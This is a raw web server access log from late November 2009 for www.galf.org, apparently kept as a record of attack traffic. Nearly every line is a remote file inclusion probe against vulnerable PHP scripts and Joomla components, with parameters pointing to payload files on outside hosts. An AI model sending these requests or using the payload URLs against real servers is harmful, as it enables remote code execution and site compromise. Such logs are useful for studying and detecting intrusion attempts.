124.3.124.199 - - [30/Nov/2009:02:46:48 -0800] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.prestigemarketinggroup.net/mambots/tukulid.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.galf.org"
124.3.124.199 - - [30/Nov/2009:02:47:15 -0800] "GET /mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.prestigemarketinggroup.net/mambots/tukulid.pdf?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.galf.org"
124.3.124.199 - - [30/Nov/2009:02:47:15 -0800] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.prestigemarketinggroup.net/mambots/tukulid.pdf?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.galf.org"
124.3.124.199 - - [30/Nov/2009:02:47:15 -0800] "GET /logs/access_091026.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.prestigemarketinggroup.net/mambots/tukulid.pdf?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.galf.org"
210.127.209.27 - - [30/Nov/2009:02:47:22 -0800] "GET /index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.127.209.27 - - [30/Nov/2009:02:47:22 -0800] "GET /logs/access.log%20%20//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.127.209.27 - - [30/Nov/2009:02:47:22 -0800] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.255.23.47 - - [30/Nov/2009:02:47:38 -0800] "GET /logs/scripts.log////?_SERVER[DOCUMENT_ROOT]=http://www.cwbongrim.or.kr/zboard/icon/private_name/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.255.23.47 - - [30/Nov/2009:02:47:38 -0800] "GET /logs/access_090706.log////?_SERVER[DOCUMENT_ROOT]=http://www.cwbongrim.or.kr/zboard/icon/private_name/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.255.23.47 - - [30/Nov/2009:02:47:38 -0800] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.cwbongrim.or.kr/zboard/icon/private_name/idxx.txt??? HTTP/1.1" 200 1049 "-" "Mozilla/5.0" "www.galf.org"
211.255.23.47 - - [30/Nov/2009:02:47:39 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.cwbongrim.or.kr/zboard/icon/private_name/idxx.txt??? HTTP/1.1" 200 4949 "-" "Mozilla/5.0" "www.galf.org"
124.3.124.199 - - [30/Nov/2009:02:47:40 -0800] "GET /logs/access_090629.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.prestigemarketinggroup.net/mambots/tukulid.pdf?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.galf.org"
124.3.124.199 - - [30/Nov/2009:02:47:55 -0800] "GET /logs/access_090629.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.prestigemarketinggroup.net/mambots/tukulid.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.galf.org"
211.255.23.47 - - [30/Nov/2009:02:48:12 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.cwbongrim.or.kr/zboard/icon/private_name/idxx.txt??? HTTP/1.1" 200 4949 "-" "Mozilla/5.0" "www.galf.org"
211.255.23.47 - - [30/Nov/2009:02:48:12 -0800] "GET /logs/scripts.log////?_SERVER[DOCUMENT_ROOT]=http://www.cwbongrim.or.kr/zboard/icon/private_name/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.255.23.47 - - [30/Nov/2009:02:48:12 -0800] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.cwbongrim.or.kr/zboard/icon/private_name/idxx.txt??? HTTP/1.1" 200 1049 "-" "Mozilla/5.0" "www.galf.org"
211.255.23.47 - - [30/Nov/2009:02:48:28 -0800] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.cwbongrim.or.kr/zboard/icon/private_name/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.255.23.47 - - [30/Nov/2009:02:48:28 -0800] "GET /index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.cwbongrim.or.kr/zboard/icon/private_name/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.255.23.47 - - [30/Nov/2009:02:48:28 -0800] "GET /logs/access.log%20%20//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.cwbongrim.or.kr/zboard/icon/private_name/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.255.23.47 - - [30/Nov/2009:02:48:49 -0800] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.cwbongrim.or.kr/zboard/icon/private_name/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.255.23.47 - - [30/Nov/2009:02:48:49 -0800] "GET /logs/access.log%20%20//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.cwbongrim.or.kr/zboard/icon/private_name/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.255.23.47 - - [30/Nov/2009:02:48:49 -0800] "GET /index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.cwbongrim.or.kr/zboard/icon/private_name/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.255.23.47 - - [30/Nov/2009:02:51:29 -0800] "GET /logs/access_090330.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.cwbongrim.or.kr/zboard/icon/private_name/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.255.23.47 - - [30/Nov/2009:02:51:29 -0800] "GET /logs/access.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.cwbongrim.or.kr/zboard/icon/private_name/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.255.23.47 - - [30/Nov/2009:02:51:32 -0800] "GET /logs/access_090330.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.cwbongrim.or.kr/zboard/icon/private_name/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.255.23.47 - - [30/Nov/2009:02:51:44 -0800] "GET /logs/access.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.cwbongrim.or.kr/zboard/icon/private_name/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.127.209.27 - - [30/Nov/2009:02:53:17 -0800] "GET /logs/access_090330.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.127.209.27 - - [30/Nov/2009:02:53:17 -0800] "GET /logs/access.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.127.209.27 - - [30/Nov/2009:02:54:07 -0800] "GET /logs/access_090330.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.127.209.27 - - [30/Nov/2009:02:54:07 -0800] "GET /logs/access.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.255.23.47 - - [30/Nov/2009:02:54:53 -0800] "GET /logs/access_090706.log////?_SERVER[DOCUMENT_ROOT]=http://www.cwbongrim.or.kr/zboard/icon/private_name/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.52.189.20 - - [30/Nov/2009:02:54:58 -0800] "GET /appserv/main.php?appserv_root=http://luvyadating.com/temp/uservideos/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.52.189.20 - - [30/Nov/2009:02:54:58 -0800] "GET /logs/access.log//appserv/main.php?appserv_root=http://luvyadating.com/temp/uservideos/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.52.189.20 - - [30/Nov/2009:02:54:58 -0800] "GET /logs//appserv/main.php?appserv_root=http://luvyadating.com/temp/uservideos/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
200.71.237.150 - - [30/Nov/2009:02:55:32 -0800] "GET /logs/access_090803.log//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.futurenetwork.com.br/loja/images/fxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.71.237.150 - - [30/Nov/2009:02:56:27 -0800] "GET /logs/access_090803.log//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.futurenetwork.com.br/loja/images/fxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.217.5.165 - - [30/Nov/2009:02:58:56 -0800] "GET /logs/access.log//include/bbs.lib.inc.php/error.php?dir=http://kmcuria.com/bbs/include/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.217.5.165 - - [30/Nov/2009:02:58:56 -0800] "GET /include/bbs.lib.inc.php/error.php?dir=http://kmcuria.com/bbs/include/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.217.5.165 - - [30/Nov/2009:02:58:56 -0800] "GET /logs//include/bbs.lib.inc.php/error.php?dir=http://kmcuria.com/bbs/include/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.127.209.27 - - [30/Nov/2009:03:02:15 -0800] "GET /logs/scripts.log////?_SERVER[DOCUMENT_ROOT]=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.127.209.27 - - [30/Nov/2009:03:02:15 -0800] "GET ///?_SERVER[DOCUMENT_ROOT]=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 200 1049 "-" "Mozilla/5.0" "www.galf.org"
210.127.209.27 - - [30/Nov/2009:03:02:16 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 200 4949 "-" "Mozilla/5.0" "www.galf.org"
210.127.209.27 - - [30/Nov/2009:03:02:51 -0800] "GET /logs/access_090706.log////?_SERVER[DOCUMENT_ROOT]=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.217.5.165 - - [30/Nov/2009:03:03:05 -0800] "GET /logs/access_090713.log//include/bbs.lib.inc.php/error.php?dir=http://kmcuria.com/bbs/include/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.127.209.27 - - [30/Nov/2009:03:04:24 -0800] "GET /logs/access_090706.log////?_SERVER[DOCUMENT_ROOT]=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.58.71.90 - - [30/Nov/2009:03:05:54 -0800] "GET /logs/access_090720.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.whinercentral.com/modules/Neos_Chronos/modules/admin/mawar.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.200.255.18 - - [30/Nov/2009:03:06:10 -0800] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.200.255.18 - - [30/Nov/2009:03:06:13 -0800] "GET /logs/access_090713.log%20%20/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.200.255.18 - - [30/Nov/2009:03:06:13 -0800] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.200.255.18 - - [30/Nov/2009:03:06:28 -0800] "GET /logs/access_090713.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.200.255.18 - - [30/Nov/2009:03:06:28 -0800] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.200.255.18 - - [30/Nov/2009:03:06:28 -0800] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.200.255.18 - - [30/Nov/2009:03:06:28 -0800] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.200.255.18 - - [30/Nov/2009:03:06:28 -0800] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.200.255.18 - - [30/Nov/2009:03:06:28 -0800] "GET /logs/access_090713.log%20%20/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.200.255.18 - - [30/Nov/2009:03:06:44 -0800] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.200.255.18 - - [30/Nov/2009:03:06:44 -0800] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.200.255.18 - - [30/Nov/2009:03:06:44 -0800] "GET /logs/access_090713.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:03:07:32 -0800] "GET /logs/access_090622.log%20%20//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:03:07:32 -0800] "GET /xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:03:07:32 -0800] "GET /logs//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.200.255.18 - - [30/Nov/2009:03:09:24 -0800] "GET /logs/access_090713.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.200.255.18 - - [30/Nov/2009:03:09:24 -0800] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.200.255.18 - - [30/Nov/2009:03:09:24 -0800] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.200.255.18 - - [30/Nov/2009:03:09:33 -0800] "GET /logs/access_090713.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.200.255.18 - - [30/Nov/2009:03:09:34 -0800] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.200.255.18 - - [30/Nov/2009:03:09:34 -0800] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.55.207.123 - - [30/Nov/2009:03:09:52 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:03:10:28 -0800] "GET /logs/access_090622.log//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.127.209.27 - - [30/Nov/2009:03:12:53 -0800] "GET /logs/access_090713.log//agendax/addevent.inc.php?agendax_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.127.209.27 - - [30/Nov/2009:03:12:53 -0800] "GET /agendax/addevent.inc.php?agendax_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.127.209.27 - - [30/Nov/2009:03:12:53 -0800] "GET /logs//agendax/addevent.inc.php?agendax_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.127.209.27 - - [30/Nov/2009:03:14:21 -0800] "GET /logs/access_090713.log//agendax/addevent.inc.php?agendax_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.127.209.27 - - [30/Nov/2009:03:14:21 -0800] "GET /logs//agendax/addevent.inc.php?agendax_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.127.209.27 - - [30/Nov/2009:03:14:22 -0800] "GET /agendax/addevent.inc.php?agendax_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.233.89.196 - - [30/Nov/2009:03:18:58 -0800] "GET /logs/access_090622.log/phphtml.php?htmlclass_path=http://aop.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.233.89.196 - - [30/Nov/2009:03:18:58 -0800] "GET /logs/phphtml.php?htmlclass_path=http://aop.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.233.89.196 - - [30/Nov/2009:03:18:58 -0800] "GET /phphtml.php?htmlclass_path=http://aop.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.233.89.196 - - [30/Nov/2009:03:18:58 -0800] "GET /logs/access_090622.log/phphtml.php?htmlclass_path=http://aop.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.233.89.196 - - [30/Nov/2009:03:18:58 -0800] "GET /logs/phphtml.php?htmlclass_path=http://aop.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.233.89.196 - - [30/Nov/2009:03:18:58 -0800] "GET /phphtml.php?htmlclass_path=http://aop.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.26.26 - - [30/Nov/2009:03:20:35 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://mubankaii.no-ip.biz:8090//appserv/sid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.26.26 - - [30/Nov/2009:03:20:35 -0800] "GET /logs/access_091019.log%20%20//admin/spaw/spaw_control.class.php?spaw_root=http://mubankaii.no-ip.biz:8090//appserv/sid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.26.26 - - [30/Nov/2009:03:20:35 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://mubankaii.no-ip.biz:8090//appserv/sid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.66.10 - - [30/Nov/2009:03:20:44 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://www.ostrava.kr//bbs/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.66.10 - - [30/Nov/2009:03:20:44 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.ostrava.kr//bbs/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.66.10 - - [30/Nov/2009:03:20:44 -0800] "GET /logs/access_091019.log%20%20//admin/spaw/spaw_control.class.php?spaw_root=http://www.ostrava.kr//bbs/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.233.89.196 - - [30/Nov/2009:03:21:12 -0800] "GET /logs/access_090720.log/phphtml.php?htmlclass_path=http://aop.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.233.89.196 - - [30/Nov/2009:03:21:12 -0800] "GET /logs/access_090706.log/phphtml.php?htmlclass_path=http://aop.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.233.89.196 - - [30/Nov/2009:03:21:12 -0800] "GET /logs/phphtml.php?htmlclass_path=http://aop.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.233.89.196 - - [30/Nov/2009:03:21:12 -0800] "GET /phphtml.php?htmlclass_path=http://aop.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.233.89.196 - - [30/Nov/2009:03:21:14 -0800] "GET /logs/access_090720.log/phphtml.php?htmlclass_path=http://aop.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.233.89.196 - - [30/Nov/2009:03:21:14 -0800] "GET /logs/phphtml.php?htmlclass_path=http://aop.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.233.89.196 - - [30/Nov/2009:03:21:14 -0800] "GET /phphtml.php?htmlclass_path=http://aop.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.233.89.196 - - [30/Nov/2009:03:21:14 -0800] "GET /logs/access_090706.log/phphtml.php?htmlclass_path=http://aop.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.200.255.18 - - [30/Nov/2009:03:22:28 -0800] "GET /logs/access_090622.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.200.255.18 - - [30/Nov/2009:03:22:36 -0800] "GET /logs/access_090622.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [30/Nov/2009:03:25:03 -0800] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://4pppp.com/images/img1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [30/Nov/2009:03:25:03 -0800] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://4pppp.com/images/img1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [30/Nov/2009:03:25:03 -0800] "GET /logs/access_090713.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://4pppp.com/images/img1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [30/Nov/2009:03:25:08 -0800] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://4pppp.com/images/img1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [30/Nov/2009:03:25:08 -0800] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://4pppp.com/images/img1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [30/Nov/2009:03:25:08 -0800] "GET /logs/access_090713.log%20%20/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://4pppp.com/images/img1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [30/Nov/2009:03:25:10 -0800] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://4pppp.com/images/img1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [30/Nov/2009:03:25:10 -0800] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://4pppp.com/images/img1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [30/Nov/2009:03:25:10 -0800] "GET /logs/access_090713.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://4pppp.com/images/img1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [30/Nov/2009:03:25:10 -0800] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://4pppp.com/images/img1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [30/Nov/2009:03:25:10 -0800] "GET /logs/access_090713.log%20%20/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://4pppp.com/images/img1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [30/Nov/2009:03:25:10 -0800] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://4pppp.com/images/img1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [30/Nov/2009:03:25:16 -0800] "GET /logs/access_090713.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [30/Nov/2009:03:25:16 -0800] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [30/Nov/2009:03:25:16 -0800] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
